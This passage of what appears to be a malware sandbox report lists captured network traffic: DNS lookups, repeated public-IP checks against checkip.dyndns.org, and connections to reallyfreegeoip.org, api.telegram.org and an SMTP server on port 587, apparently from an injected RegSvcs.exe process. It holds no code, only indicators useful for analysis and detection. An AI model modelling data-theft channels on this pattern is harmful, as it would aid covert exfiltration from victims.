                                                                                                                Jan 10, 2025 19:11:12.687706947 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:12.687887907 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:12.689742088 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:12.690125942 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:17.869951010 CET4983880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:18.009519100 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:18.014437914 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:18.014503956 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:18.559165001 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:18.559390068 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:18.564546108 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:18.680435896 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:18.680958033 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:18.686785936 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:22.805089951 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:22.805380106 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:22.810209990 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.548578978 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.548854113 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.553730011 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.669436932 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.669635057 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.676373959 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.792495012 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.792799950 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.798331976 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.798409939 CET49947587192.168.2.63.130.71.34

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 19:10:44.553699970 CET5507053192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET53550701.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.684606075 CET6510753192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET53651071.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.692305088 CET5589653192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 19:10:59.699177980 CET53558961.1.1.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.660609961 CET6049753192.168.2.61.1.1.1
                                                                                                                Jan 10, 2025 19:11:06.845731020 CET53604971.1.1.1192.168.2.6

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 19:10:44.553699970 CET192.168.2.61.1.1.10xb0d6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.684606075 CET192.168.2.61.1.1.10x9050Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:59.692305088 CET192.168.2.61.1.1.10x5341Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:11:06.660609961 CET192.168.2.61.1.1.10xb00Standard query (0)mail.acadental.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:44.561686039 CET1.1.1.1192.168.2.60xb0d6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:45.793999910 CET1.1.1.1192.168.2.60x9050No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:10:59.699177980 CET1.1.1.1192.168.2.60x5341No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 19:11:06.845731020 CET1.1.1.1192.168.2.60xb00No error (0)mail.acadental.com3.130.71.34A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.649710193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:44.585953951 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:45.235472918 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 19:10:45.449196100 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:10:45.640822887 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 19:10:46.520664930 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:10:46.852461100 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:46 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.649719193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:47.489238977 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:10:49.170382023 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:49 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.649736193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:49.792860031 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:10:50.442044020 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:50 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.649748193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:51.097515106 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:52.732923031 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:52 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.649766193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:53.577761889 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:54.225126028 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:54 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.649778193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:54.864471912 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:56.503776073 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:56 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.649795193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:57.127774000 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:57.765115023 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:57 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.649807193.122.6.168806108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:10:58.408020973 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:10:59.036676884 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:58 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.649820193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:00.572510004 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:01.197823048 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:01 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 19:11:01.202238083 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:11:01.407902002 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:01 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 19:11:02.080760956 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:11:02.265723944 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:02 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.649838193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:02.901779890 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 19:11:03.531225920 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:03 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.649850193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:04.135421038 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:04.770710945 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:04 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.649858193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:05.423007011 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:06.068742037 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:05 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.649870193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:06.687894106 CET151OUTGET / HTTP/1.1
